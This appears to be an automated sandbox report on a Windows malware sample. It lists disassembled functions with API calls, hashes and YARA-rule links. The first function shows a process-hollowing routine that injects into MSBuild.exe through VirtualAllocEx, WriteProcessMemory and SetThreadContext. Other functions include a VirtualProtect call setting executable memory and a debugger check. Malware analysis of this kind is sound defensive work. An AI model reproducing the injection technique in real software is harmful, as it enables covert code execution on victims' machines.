Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: b8b006fb95828e9b6610b2e95e4aaad224117086ba890a6e1987b39585d6249b
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: 2EB1087260168AAFDB60CF68CC80BDA73A5FF88714F158124EA0CAB341D774FA51CB94

Function 00E91614 Relevance: 9.2, APIs: 6, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E91098: _strlen.LIBCMT ref: 00E910F9

CreateFileA.KERNELBASE ref: 00E91675
GetFileSize.KERNEL32(00000000,00000000), ref: 00E91685
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00E916AB
CloseHandle.KERNELBASE(00000000), ref: 00E916BA
_strlen.LIBCMT ref: 00E91705
CloseHandle.KERNEL32(00000000), ref: 00E91805

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: File$CloseHandle_strlen$CreateReadSize
String ID:
API String ID: 2911764282-0
Opcode ID: 025b09162ac51c656a73a92316f0b2c157df0c03c8ef2c4114bc6a124ec30df0
Instruction ID: 98f428fce44142ee893f4e90e44745bb8fbf42e4d5a882982cdaecccf1da6007
Opcode Fuzzy Hash: 025b09162ac51c656a73a92316f0b2c157df0c03c8ef2c4114bc6a124ec30df0
Instruction Fuzzy Hash: 3E51FEB19043029BCB14AF24DC85B6BBBE5FF89348F155A2DF889A3251E73499488B52

Function 00E9155C Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E91098: _strlen.LIBCMT ref: 00E910F9

FreeConsole.KERNELBASE ref: 00E9158B

Part of subcall function 00E9123B: KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 00E912C7

VirtualProtect.KERNELBASE(00EB5011,00000549,00000040,?), ref: 00E915D7
ExitProcess.KERNEL32 ref: 00E9160E

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ConsoleDispatcherExceptionExitFreeProcessProtectUserVirtual_strlen
String ID:
API String ID: 2898289550-0
Opcode ID: 1d4e325c9aa6a262f3e75d902086da18b6f5f3f73738077acf6542ecc0d0a8a7
Instruction ID: 34bb00492d3ece07588653e98c513f6bf1c191619b1bdcb39175e8389c1a0e71
Opcode Fuzzy Hash: 1d4e325c9aa6a262f3e75d902086da18b6f5f3f73738077acf6542ecc0d0a8a7
Instruction Fuzzy Hash: D111E372A002096BEB00BBA59C43BFF73A8EF84700F404065F908B7291EA75A9054BE1

Function 00E9123B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 00E912C7

Strings

[+], xrefs: 00E912E1

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: [+]
API String ID: 6842923-4228040803
Opcode ID: d5a4edd53428f17cd7d5e1ce4617881bb508480edfe32c72202d296110852d22
Instruction ID: eb4d9e6940de53cf90754dd0a2faa52d62f9427a192545ed2f795eecda9f3a7f
Opcode Fuzzy Hash: d5a4edd53428f17cd7d5e1ce4617881bb508480edfe32c72202d296110852d22
Instruction Fuzzy Hash: 80312B3160C3C14FDB26AB3468997EBBBD0AFBD318F1909BDD8C997243D1615446CB62

Function 00EA5283 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EA562D: GetConsoleOutputCP.KERNEL32(8040FA0D,00000000,00000000,?), ref: 00EA5690

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00E9BBF3,?), ref: 00EA5408
GetLastError.KERNEL32(?,?,00E9BBF3,?,00E9BE37,00000000,?,00000000,00E9BE37,?,?,?,00EB4628,0000002C,00E9BD23,?), ref: 00EA5412

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: a1018f3d0de75daccd8e95f32c91ac1e73fc2857d0577d3b2c52e172036c9048
Instruction ID: c7a9f02a21148fc939da3dece07de34f65f96c5294a93905d852695bcdd9649a
Opcode Fuzzy Hash: a1018f3d0de75daccd8e95f32c91ac1e73fc2857d0577d3b2c52e172036c9048
Instruction Fuzzy Hash: 5261B272D00609AFDF11CFA8D845AEEBBF9AF4E308F141195E811BB216D371E945CB60

Function 00EA5A5C Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00EA53EE,00000000,00E9BE37,?,00000000,?,00000000), ref: 00EA5AF8
GetLastError.KERNEL32(?,00EA53EE,00000000,00E9BE37,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00E9BBF3), ref: 00EA5B1E

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: b1b330dc925f1a6f2744d0cc3ca3ee590556bc32c325d932be79be02154b6a5e
Instruction ID: cdc769cf5da34fc6ebfe55ebf038cc2679f6d7a1d8305cfcccffc369192eaeb7
Opcode Fuzzy Hash: b1b330dc925f1a6f2744d0cc3ca3ee590556bc32c325d932be79be02154b6a5e
Instruction Fuzzy Hash: 13218032A002199FCF15CF29DD809EDB7B9EF5D305F2441A9E906EB211D630AE46CB60

Function 00E9FF89 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00E9FE78,00EB4948), ref: 00E9FFD5
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00E9FE78,00EB4948), ref: 00E9FFE7

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 11b98b8a7183ca129ffbcd18fa6ee619d5435b0a3dda566927286a80f12e6e17
Instruction ID: b5cb61acf2f45504904ef6eb3d547a1dca997a6cce2954fadd88d408528a0e4d
Opcode Fuzzy Hash: 11b98b8a7183ca129ffbcd18fa6ee619d5435b0a3dda566927286a80f12e6e17
Instruction Fuzzy Hash: 7A11B7716047114ACB304E3E9CC87237A95A75B338B341B1AD1B6FA5F1C330E946D240

Function 00E9136E Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 00E91388

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: c1ede9731a4cae8a9ba4361f7f725261e95b0344136c98bd6ff067b194f7e541
Instruction ID: d2bef6d8d7852ae33f77d2c503b21f2b9c9837c17093d3322aea6ab2f1344864
Opcode Fuzzy Hash: c1ede9731a4cae8a9ba4361f7f725261e95b0344136c98bd6ff067b194f7e541
Instruction Fuzzy Hash: CA5180353042058FCB14DF6CC994B6A77D6EB88328F1986ACE969DB392D630ED05CB41

Function 00E93C29 Relevance: 1.6, APIs: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9342ec2dfbc5ea8fb8c88a150f31d47631ec56e6382b49cb8f23b86643af154
Instruction ID: d66940b7143305d8ad98979df415f74b12936e9e23edec1d88f1e39516bdf5a3
Opcode Fuzzy Hash: e9342ec2dfbc5ea8fb8c88a150f31d47631ec56e6382b49cb8f23b86643af154
Instruction Fuzzy Hash: AA31647250051AAFCF14DF78D8909EEB7F9BF09324B14526AE512F7690D731EA44CB60

Function 00E93C1B Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: 4315a70be37b85533f4f50e40ba676c829045ba515eda8ec8d52975acd5f2763
Instruction ID: c8f321c9d81de4512ee1e972d0fb35b61affe69c6d686105c50ec518541e8037
Opcode Fuzzy Hash: 4315a70be37b85533f4f50e40ba676c829045ba515eda8ec8d52975acd5f2763
Instruction Fuzzy Hash: 71F0243A60865A5ACF259A78A96A7ADFB50FF4633CF74715FD412B90D1CA024A80C220

Function 00E9E531 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00E931E1,00E9186A,?,00E960C1,00E9186C,00E9186A,?,?,?,00E93181,00E931E1,00E9186E,00E9186A,00E9186A,00E9186A), ref: 00E9E563

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a05048e119bbde73d2942272b0e8233f9f5a233965f447091350ec52cb307e17
Instruction ID: ced070c7edf3bde3394554818a6fd4b6905a52d0d3303f175fbf6fb71af84b6f
Opcode Fuzzy Hash: a05048e119bbde73d2942272b0e8233f9f5a233965f447091350ec52cb307e17
Instruction Fuzzy Hash: DAE06531A512255ADF21EA66AC01B6B3688AF41BBCF162121EE55B7391FF61DD0081A1

Non-executed Functions

Function 00EA3178 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00EA2B49,00000002,00000000,?,?,?,00EA2B49,?,00000000), ref: 00EA3211
GetLocaleInfoW.KERNEL32(?,20001004,00EA2B49,00000002,00000000,?,?,?,00EA2B49,?,00000000), ref: 00EA323A
GetACP.KERNEL32(?,?,00EA2B49,?,00000000), ref: 00EA324F

Strings

OCP, xrefs: 00EA31CC
ACP, xrefs: 00EA3196

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: a2c6e6ad1242d4d95952a4af16ee3711712f1be8fb93ad954da1d3c15896c457
Instruction ID: 9e73dff67052ddaa2c15ffb928ddb7564af5429e23b0d5e6397cbcbf986473be
Opcode Fuzzy Hash: a2c6e6ad1242d4d95952a4af16ee3711712f1be8fb93ad954da1d3c15896c457
Instruction Fuzzy Hash: D8219232601100AADB348F75D905B9777A6AFAAB58B165525F906FF120E732FF40D360

Function 00EA2A13 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00EA2B1B
IsValidCodePage.KERNEL32(00000000), ref: 00EA2B59
IsValidLocale.KERNEL32(?,00000001), ref: 00EA2B6C
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00EA2BB4
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00EA2BCF

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: bea89e2bf8f154467d668a3560bbabc3d69b3c4d5565f6e0e55361e339b7705f
Instruction ID: 1411a46b7fbef52e07700700b0c6076bf31ee038b601557a128d5dccf85376d3
Opcode Fuzzy Hash: bea89e2bf8f154467d668a3560bbabc3d69b3c4d5565f6e0e55361e339b7705f
Instruction Fuzzy Hash: 27515D71A00216AFDF20DFA9CC41AAE77F8AF1E704F14516DEA10FB150E7B0AA449B61

Function 00EA375A Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EA384A

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 09cb7d264a95a2ab47ded4e90f50c204f8b89e5baca98c6cae0d43e9a8865549
Instruction ID: f93dd9c85417171ef9bc843fd9a26e710f447fc1e99b4d18feb4b830d34ee675
Opcode Fuzzy Hash: 09cb7d264a95a2ab47ded4e90f50c204f8b89e5baca98c6cae0d43e9a8865549
Instruction Fuzzy Hash: ED71E4B1D051685FDF20DF788C8DAAABBB9AF4A304F1451DAF049BB211DA316F848F10

Function 00E95020 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00E9502C
IsDebuggerPresent.KERNEL32 ref: 00E950F8
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E95111
UnhandledExceptionFilter.KERNEL32(?), ref: 00E9511B

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: d3acd638ff424d0526b9913a4bb61a6b72db8598f56305cda9c1f49b1d423d5a
Instruction ID: e185e9446d4b034aeb0b00a5b322a15f121def24cc144cf9a3e8c8644b8f4629
Opcode Fuzzy Hash: d3acd638ff424d0526b9913a4bb61a6b72db8598f56305cda9c1f49b1d423d5a
Instruction Fuzzy Hash: 163129B5D052199BDF21DFA5D849BCDBBB8AF08304F1051AAE40CAB250EB719B858F44

Function 00E959A7 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00E959B9
GetCurrentThreadId.KERNEL32 ref: 00E959C8
GetCurrentProcessId.KERNEL32 ref: 00E959D1
QueryPerformanceCounter.KERNEL32(?), ref: 00E959DE

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: de83eb8ee09a46dc2594a8cf098e4fe7e5cd05499570ff91b4512d6d3f5f6b26
Instruction ID: bfabd1ed7c24e9085aad0a552278d0f794b0b00ed994ddd674bc70c1a680daa9
Opcode Fuzzy Hash: de83eb8ee09a46dc2594a8cf098e4fe7e5cd05499570ff91b4512d6d3f5f6b26
Instruction Fuzzy Hash: 84F0AF30D1120CEFCB00DBB5C94A98EBBF4FF1C200BA14696A412F7110E630AB488F50

Function 00EA2CFF Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EA2D53
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EA2D9D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EA2E63

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

